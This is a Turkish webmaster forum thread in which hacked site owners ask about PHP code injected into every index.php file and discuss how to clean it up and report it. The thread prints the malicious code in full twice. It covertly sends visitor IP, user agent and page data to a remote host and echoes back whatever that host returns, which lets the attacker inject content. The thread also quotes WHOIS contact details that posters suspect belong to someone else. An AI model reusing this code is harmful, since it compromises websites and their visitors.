sitem JS/Iframe.AS virüs uyarısı veriyor.

Ondadokuz · 1 19-12-2011, 12:45:48

siteme girdiğimde nod32 antivürüs uyarısı verdi. sitemi karantinaya aldı. hosttaki dosyaları incediğimde tüm index.php isimli dosyaların en altına aşağıdaki kod eklenmişti.

Kod:

<?
if (!isset($sRetry))
{
global $sRetry;
$sRetry = 1;
    // This code use for global bot statistic
    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot
    $stCurlHandle = NULL;
    $stCurlLink = "";
    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes
    {
        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            
        $stCurlLink = base64_decode( 'aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA==').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);
            $stCurlHandle = curl_init( $stCurlLink ); 
    }
    } 
if ( $stCurlHandle !== NULL )
{
    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
    $sResult = @curl_exec($stCurlHandle); 
    if ($sResult[0]=="O") 
     {$sResult[0]=" ";
      echo $sResult; // Statistic code end
      }
    curl_close($stCurlHandle); 
}
}
?>

her dosyayı tek tek temizledim. bu kodlar ne işe yarar. nereden nasıl bu kodlar dosyalara işlenmiş. bu durumdan nasıl kurtulurum ve bi daha olmaması için ne yapmalıyım.

emraheren · 2 19-03-2012, 10:16:59

Konu hakkında yardımcı olabilirmisiniz acaba. Yeni reseller hesabıma siteleri taşımaya başladım hatta sıfırdan kurduğum sitelerde var hepsinin index.php dosyasına alttaki kodlar eklenmekte siliyorum tekrar ekleniyor.

SMF sitem opencart sitem mevcut ve 2 sin dede aynı sorun var.

Ne yapmam lazım neden kaynaklanıyor olabilir.

PHP- Kodu:

  <?php

if (!isset($sRetry))

{

global $sRetry;

$sRetry = 1;

    // This code use for global bot statistic

    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot

    $stCurlHandle = NULL;

    $stCurlLink = "";

    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes

    {

        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            

        $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

            $stCurlHandle = curl_init( $stCurlLink ); 

    }

    } 

if ( $stCurlHandle !== NULL )

{

    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);

    $sResult = [MENTION=53427]Curl[/MENTION]_exec($stCurlHandle); 

    if ($sResult[0]=="O") 

     {$sResult[0]=" ";

      echo $sResult; // Statistic code end

      }

    curl_close($stCurlHandle); 

}

}

?>

~~develiweb~~ · 3 19-03-2012, 14:59:16

sorunun aynısı 2 gün önce başıma geldi.
Bu konu hakkında bir makale yazmıştım : http://www.hptimi.com/looks-for-goog...unu-temizleme/
ssh üzerinden aHR0cDovL2hvdGxvZ3VwZGF0ZS5jb20vc3RhdC9zdGF0LnBocA kodunu arattım. Bu kodun geçtiği dosyaları temizledim ve geri sunucuya yükledim. Ayrıca dosyalara 644 chmod izni verdim. Son olarak da ftp şifremi değiştirip format attım

Queen · 4 19-03-2012, 15:18:53

Bunu yapan her kimse siteler üzerinden zombi oluşturuyor bir nevi botnet agı gibi birşey

http://adveconfirm.com/ Saldırgan olarak bildirilmiş site!

http://adveconfirm.com/stat/stat.php buradan kontrol saglıyor.

Bots vs Browsers - Public Bots and User Agents Database and Commentary
Arama motorları vs Tarayıcılar - Kamu Arama motorları ve Kullanıcı Ajanlar Veritabanı vs vs.

Bunu yapanda bir rus sanırım. Free hosting kullanıyor

~~develiweb~~ · 5 19-03-2012, 20:39:38

Alıntı:

Queen Nickli Üyeden Alıntı

Bunu yapan her kimse siteler üzerinden zombi oluşturuyor bir nevi botnet agı gibi birşey

http://adveconfirm.com/ Saldırgan olarak bildirilmiş site!

http://adveconfirm.com/stat/stat.php buradan kontrol saglıyor.

Bots vs Browsers - Public Bots and User Agents Database and Commentary
Arama motorları vs Tarayıcılar - Kamu Arama motorları ve Kullanıcı Ajanlar Veritabanı vs vs.

Bunu yapanda bir rus sanırım. Free hosting kullanıyor

botnet gibi şeyler için kullandırmıyor, ama ne için kullandırdığını da çözebilmiş değilim. Bu kodun olduğu siteye giren kişi adveconfirm.com sitesine de giriyor tabi haberi olmadan, ayrıca istatistiğe kayıt ettiriyor amacı nedir kim bilir

Queen · 6 19-03-2012, 21:52:48

Alıntı:

develiweb Nickli Üyeden Alıntı

botnet gibi şeyler için kullandırmıyor, ama ne için kullandırdığını da çözebilmiş değilim. Bu kodun olduğu siteye giren kişi adveconfirm.com sitesine de giriyor tabi haberi olmadan, ayrıca istatistiğe kayıt ettiriyor amacı nedir kim bilir

Sonuç olarak stat/stat.php var online kullanıcılara birşeyler yaptırdıgı kesin zaten.

muwat · 7 16-04-2012, 12:57:24

arkadaşlar dediklerinizi uyguladım aynı kod bendede vardı dünde farklı bir virüs vardı bakalım ben ilk başta ilk açılıştaki sayfadaki scripti alıntı yapmıştım ordan geliyor diye düşünmüştüm ama iframe çıktı dediklerinizi uyguladım şimdi bilgisayara format atıcam inş. kurtulurum bu virüsten yardımlarınız için teşekkür ederim bu arada sorunu düzelten arkadaşlar birdaha virüs bulaştımı onu yazarlarsa çok güzel olur

WTF · 8 16-04-2012, 13:27:18

PHP- Kodu:

    $stCurlLink = base64_decode( 'aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

de aHR0cDovL2FkdmVjb25maXJtLmNvbS9zdGF0L3N0YXQucGhw base64 decode edersek http://hotlogupdate.com/stat/stat.php çıkıyor

hotlogupdate.com domani bizcn.com üzerinden alınmış ve NS adresi qwkspspl.com.

qwkspspl.com domani de bizcn.com üzerinden alınmış NS leri qwkspspl.com yine.

hotlogupdate sahibi qwkspspl sahibi aynı kişi whoisde

Alıntı:

Yulia Gaydukova
+74956173849 fax: +74956173849
Ul.Krylatskiye holmi, dom 33, korp.2, kv.264
Moscow Moscow region 183945
ru

Yazıyor ama bu bilği ne kadar doğru tartışılır başka birinin bilğileridir %99 bu işi yapan kişi kendi bilğilerini verceğini sanmıyorum.

Neyse verdiğiniz kod

Server IP sini
Tarayıcı Bilğisini
Alan Adını
Dosyanın Konumunu

http://hotlogupdate.com/stat/stat.php

yollluyor

Daha sonra da botsvsbrowsers.com sitesinde de Crome dan şukar kişi ziyaret etmiş gibisinden adam genel bir istatisik topluyor kod içerisinde bot net yapısı yok sadece bilği topluyor o da adamın sitesinde yayınlanıyor. botsvsbrowsers.com da MAXIMUMASP.COM da barındırılıyor

Şimdi Yapılması gerekenler
1- Bu gibi durumlarda ICANN ilk önce Registart a bildirilmesini söylüyor yani abuse@bizcn.com mail atıp Domain'in kapatılma talebi gönderilmeli
2- info@us-cert.gov e bilği vermek
3- MAXIMUMASP hosting e durum bildirilmeli

Seçenekler
Yazdırılabilir şekli göster Sayfayı E-Mail olarak gönder